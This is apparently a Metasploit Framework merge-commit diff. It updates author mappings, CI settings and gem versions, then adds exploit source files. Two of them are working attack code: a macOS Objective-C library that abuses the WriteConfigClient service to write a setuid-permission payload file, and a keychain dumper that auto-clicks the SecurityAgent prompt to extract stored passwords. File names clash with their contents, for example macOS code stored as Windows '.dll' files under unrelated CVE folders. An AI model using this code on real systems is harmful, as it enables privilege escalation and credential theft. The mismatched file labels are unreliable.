Merge branch 'master' of https://github.com/rapid7/metasploit-framework into pageant_extension

Author: stufus

.mailmap

@@ -1,4 +1,5 @@
 bcook-r7 <bcook-r7@github>         Brent Cook <[email protected]>
+bcook-r7 <bcook-r7@github>         <[email protected]>
 bturner-r7 <bturner-r7@github>     Brandon Turner <[email protected]>
 ccatalan-r7 <ccatalan-r7@github>   Christian Catalan <[email protected]>
 cdoughty-r7 <cdoughty-r7@github>   Chris Doughty <[email protected]>
@@ -11,9 +12,8 @@ farias-r7 <farias-r7@github>       Fernando Arias <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 jhart-r7 <jhart-r7@github>         Jon Hart <[email protected]>
-jlee-r7 <jlee-r7@github>           James Lee <[email protected]>
-jlee-r7 <jlee-r7@github>           James Lee <[email protected]> # aka egypt
-jlee-r7 <jlee-r7@github>           egypt <[email protected]> # aka egypt
+jlee-r7 <jlee-r7@github>           <[email protected]>
+jlee-r7 <jlee-r7@github>           <[email protected]> # aka egypt
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 kgray-r7 <kgray-r7@github>         Kyle Gray <[email protected]>
@@ -37,9 +37,8 @@ todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
-wchen-r7 <wchen-r7@github>         Wei Chen <[email protected]>
-wchen-r7 <wchen-r7@github>         sinn3r <[email protected]> # aka sinn3r
-wchen-r7 <wchen-r7@github>         sinn3r <[email protected]>
+wchen-r7 <wchen-r7@github>         <[email protected]> # aka sinn3r
+wchen-r7 <wchen-r7@github>         <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
@@ -73,18 +72,18 @@ efraintorres <efraintorres@github>     efraintorres <[email protected]>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 FireFart <FireFart@github>             Christian Mehlmauer <[email protected]>
+FireFart <FireFart@github>             <[email protected]>
 h0ng10 <h0ng10@github>                 h0ng10 <[email protected]>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <[email protected]>
-jcran <jcran@github>                   Jonathan Cran <[email protected]>
-jcran <jcran@github>                   Jonathan Cran <[email protected]>
-jduck <jduck@github>                   Joshua Drake <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jduck <jduck@github>                   <[email protected]>
+jduck <jduck@github>                   <[email protected]>
 jgor <jgor@github>                     jgor <[email protected]>
-joevennix <joevennix@github>           joe <[email protected]>
-joevennix <joevennix@github>           Joe Vennix <[email protected]>
-joevennix <joevennix@github>           Joe Vennix <[email protected]>
-joevennix <joevennix@github>           joev <[email protected]>
-joevennix <joevennix@github>           jvennix-r7 <[email protected]>
-joevennix <joevennix@github>           jvennix-r7 <[email protected]>
+joevennix <joevennix@github>           <[email protected]>
+joevennix <joevennix@github>           <[email protected]>
 kernelsmith <kernelsmith@github>       Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github>       Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
@@ -94,18 +93,17 @@ m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               Michael Messner <[email protected]>
-Meatballs1 <Meatballs1@github>         Ben Campbell <[email protected]>
-Meatballs1 <Meatballs1@github>         Meatballs <[email protected]>
-Meatballs1 <Meatballs1@github>         Meatballs1 <[email protected]>
+Meatballs1 <Meatballs1@github>         <[email protected]>
+Meatballs1 <Meatballs1@github>         <[email protected]>
 mubix <mubix@github>                   Rob Fuller <[email protected]>
 nevdull77 <nevdull77@github>           Patrik Karlsson <[email protected]>
 nmonkee <nmonkee@github>               nmonkee <[email protected]>
 nullbind <nullbind@github>             nullbind <[email protected]>
 nullbind <nullbind@github>             Scott Sutherland <[email protected]>
 ohdae <ohdae@github>                   ohdae <[email protected]>
-oj <oj@github>                         OJ <[email protected]>
-oj <oj@github>                         OJ Reeves <[email protected]>
+oj <oj@github>                         <[email protected]>
 r3dy <r3dy@github>                     Royce Davis <[email protected]>
+r3dy <r3dy@github>                     Royce Davis <[email protected]>
 r3dy <r3dy@github>                     Royce Davis <[email protected]>
 Rick Flores <[email protected]>  Rick Flores (nanotechz9l) <[email protected]>
 rsmudge <rsmudge@github>               Raphael Mudge <[email protected]> # Aka `butane
@@ -116,8 +114,7 @@ skape <skape@???>                      Matt Miller <[email protected]>
 spoonm <spoonm@github>                 Spoon M <[email protected]>
 swtornio <swtornio@github>             Steve Tornio <[email protected]>
 Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
-timwr <timwr@github>                   Tim <[email protected]>
-timwr <timwr@github>                   Tim Wright <[email protected]>
+timwr <timwr@github>                   <[email protected]>
 TomSellers <TomSellers@github>         Tom Sellers <[email protected]>
 TrustedSec <[email protected]>      trustedsec <[email protected]>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <[email protected]>

.travis.yml

@@ -41,3 +41,6 @@ branches:
 
 addons:
   postgresql: '9.3'
+  apt:
+    packages:
+      - libpcap-dev

Gemfile.lock

@@ -7,12 +7,13 @@ PATH
       bcrypt
       jsobfu (~> 0.2.0)
       json
+      metasm (~> 1.0.2)
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.9)
+      metasploit-payloads (= 1.0.13)
       msgpack
       nokogiri
-      packetfu (= 1.1.9)
+      packetfu (= 1.1.11)
       railties
       rb-readline-r7
       recog (= 2.0.6)
@@ -22,7 +23,7 @@ PATH
       tzinfo
     metasploit-framework-db (4.11.4)
       activerecord (>= 4.0.9, < 4.1.0)
-      metasploit-credential (= 1.0.0)
+      metasploit-credential (= 1.0.1)
       metasploit-framework (= 4.11.4)
       metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
@@ -107,11 +108,12 @@ GEM
     json (1.8.3)
     mail (2.6.3)
       mime-types (>= 1.16, < 3)
+    metasm (1.0.2)
     metasploit-concern (1.0.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-credential (1.0.0)
+    metasploit-credential (1.0.1)
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
       metasploit_data_models (~> 1.0)
@@ -123,7 +125,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.9)
+    metasploit-payloads (1.0.13)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
@@ -135,18 +137,20 @@ GEM
       railties (>= 4.0.9, < 4.1.0)
       recog (~> 2.0)
     method_source (0.8.2)
-    mime-types (2.4.3)
+    mime-types (2.6.1)
     mini_portile (0.6.2)
     minitest (4.7.5)
     msgpack (0.6.2)
-    multi_json (1.11.1)
+    multi_json (1.11.2)
     multi_test (0.1.2)
     network_interface (0.0.1)
     nokogiri (1.6.6.2)
       mini_portile (~> 0.6.0)
-    packetfu (1.1.9)
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
     pcaprub (0.12.0)
-    pg (0.18.2)
+    pg (0.18.3)
     pg_array_parser (0.0.9)
     postgres_ext (2.4.1)
       activerecord (>= 4.0.0)
@@ -198,7 +202,7 @@ GEM
       rspec-core (~> 2.99.0)
       rspec-expectations (~> 2.99.0)
       rspec-mocks (~> 2.99.0)
-    rubyntlm (0.5.1)
+    rubyntlm (0.5.2)
     rubyzip (1.1.7)
     shoulda-matchers (2.8.0)
       activesupport (>= 3.0.0)

data/exploits/CVE-2015-0016/cve-2015-0016.dll

@@ -0,0 +1,33 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+
+    exit(1);
+}

data/exploits/CVE-2015-2426/reflective_dll.x64.dll

@@ -0,0 +1,2 @@
+all:
+	gcc dump.m -framework CoreFoundation -framework Security -framework Cocoa -o dump

data/exploits/CVE-2015-3673/exploit.daplug

@@ -0,0 +1,161 @@
+// gcc dump.m -framework CoreFoundation -framework Security -framework Cocoa -o dump
+
+#import <Cocoa/Cocoa.h>
+#import <CoreFoundation/CoreFoundation.h>
+#import <Security/Security.h>
+#include <ApplicationServices/ApplicationServices.h>
+#include <unistd.h>
+#include <pthread.h>
+
+#define TIMEOUT 3
+
+void click(float x, float y) {
+
+  CGEventRef move1 = CGEventCreateMouseEvent(
+    NULL, kCGEventMouseMoved,
+    CGPointMake(x, y),
+    kCGMouseButtonLeft // ignored
+  );
+  CGEventRef click1_down = CGEventCreateMouseEvent(
+    NULL, kCGEventLeftMouseDown,
+    CGPointMake(x, y),
+    kCGMouseButtonLeft
+  );
+  CGEventRef click1_up = CGEventCreateMouseEvent(
+    NULL, kCGEventLeftMouseUp,
+    CGPointMake(x, y),
+    kCGMouseButtonLeft
+  );
+
+  CGEventPost(kCGHIDEventTap, move1);
+  CGEventPost(kCGHIDEventTap, click1_down);
+  CGEventPost(kCGHIDEventTap, click1_up);
+
+  // Release the events
+  CFRelease(move1);
+  CFRelease(click1_up);
+  CFRelease(click1_down);
+}
+
+void parse_windows(int offx, int offy) {
+  CFArrayRef windowList = CGWindowListCopyWindowInfo(kCGWindowListOptionOnScreenOnly, kCGNullWindowID);
+  for (NSMutableDictionary* entry in (NSArray*)windowList)
+  {
+      CGRect rect;
+      NSString* ownerName = [entry objectForKey:(id)kCGWindowOwnerName];
+      if ([ownerName isEqualToString: @"SecurityAgent"]) {
+        CFDictionaryRef bounds = (CFDictionaryRef)[entry objectForKey:(id)kCGWindowBounds];
+        CGRectMakeWithDictionaryRepresentation(bounds, &rect);
+        float spotx = rect.origin.x + 385 + offx;
+        float spoty = rect.origin.y + rect.size.height - 25 + offy;
+        click(spotx, spoty);
+      }
+
+  }
+  CFRelease(windowList);
+}
+
+void poll_ui() {
+  while(1) {
+    sleep(0.0001);
+    parse_windows(0, 0);
+  }
+}
+
+id tQuery = NULL;
+CFTypeRef result = NULL;
+
+void prompt() {
+  SecItemCopyMatching((__bridge CFDictionaryRef)tQuery, &result);
+}
+
+void dump(NSArray *refs) {
+  NSData *jsonData = [NSJSONSerialization dataWithJSONObject: refs
+                                                   options:NSJSONWritingPrettyPrinted // Pass 0 if you don't care about the readability of the generated string
+                                                     error: NULL];
+  [jsonData writeToFile: @"/dev/stdout" atomically: NO];
+}
+
+int main() {
+  pthread_t thread_prompt, thread_click;
+  NSArray *secItemClasses = [NSArray arrayWithObjects:
+                               (__bridge id)kSecClassGenericPassword,
+                               (__bridge id)kSecClassInternetPassword,
+                               nil];
+  NSMutableDictionary *query = [NSMutableDictionary dictionaryWithObjectsAndKeys:
+                                (__bridge id)kSecMatchLimitAll, (__bridge id)kSecMatchLimit,
+                               (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnAttributes,
+                               (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnRef,
+                                nil];
+  NSMutableArray *refs = [NSMutableArray new];
+  for (id secItemClass in secItemClasses) {
+    [query setObject:secItemClass forKey:(__bridge id)kSecClass];
+
+    CFTypeRef result1 = NULL;
+    SecItemCopyMatching((__bridge CFDictionaryRef)query, &result1);
+    NSArray *data = (__bridge NSArray*)result1;
+    if (data) {
+      for (NSDictionary *item in data) {
+        if (!item) continue;
+        NSMutableDictionary *newItem = [NSMutableDictionary new];
+        for (NSString* key in item) {
+          [newItem setObject:[[item objectForKey: key] description] forKey: key];
+        }
+        [newItem setObject:[item objectForKey: @"v_Ref"] forKey: @"v_Ref"];
+        [refs addObject: newItem];
+      }
+      if (result1 != NULL) CFRelease(result1);
+    }
+  }
+
+  NSMutableArray *all = [NSMutableArray new];
+  for (id ref in refs) {
+    tQuery = [NSMutableDictionary dictionaryWithObjectsAndKeys:
+              (__bridge id)[ref objectForKey: @"v_Ref"], (__bridge id)kSecValueRef,
+              (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnData,
+               nil];
+    for (id secItemClass in secItemClasses) {
+      [tQuery setObject:secItemClass forKey:(__bridge id)kSecClass];
+
+      result = NULL;
+      pthread_create(&thread_click, NULL, (void*)poll_ui, NULL);
+      pthread_create(&thread_prompt, NULL, (void*)prompt, NULL);
+
+      time_t end = time(NULL) + TIMEOUT;
+      int found = 0;
+      while(time(NULL) < end) {
+        if (result != NULL) {
+          found = 1;
+          break;
+        }
+        sleep(0.1);
+      }
+
+      pthread_cancel(thread_click);
+      pthread_cancel(thread_prompt);
+
+      [ref removeObjectForKey: @"v_Ref"];
+
+      // we didnt find anything  in TIMEOUT seconds. this can happen if the keychain
+      // is locked
+      if (!found) {
+        parse_windows(-80, 0); // click cancel
+        dump(all); // get out now
+        return 0;
+      }
+
+      NSString *pass = @"(null)";
+      if (result && [result bytes]) {
+        pass = [NSString stringWithUTF8String:[result bytes]];
+        if (!pass) pass = @"(null)";
+      } else {
+        pass = @"(null)";
+      }
+      [ref setObject:pass forKey: @"Private"];
+      [all addObject: ref];
+    }
+  }
+
+  dump(all);
+  return 0;
+}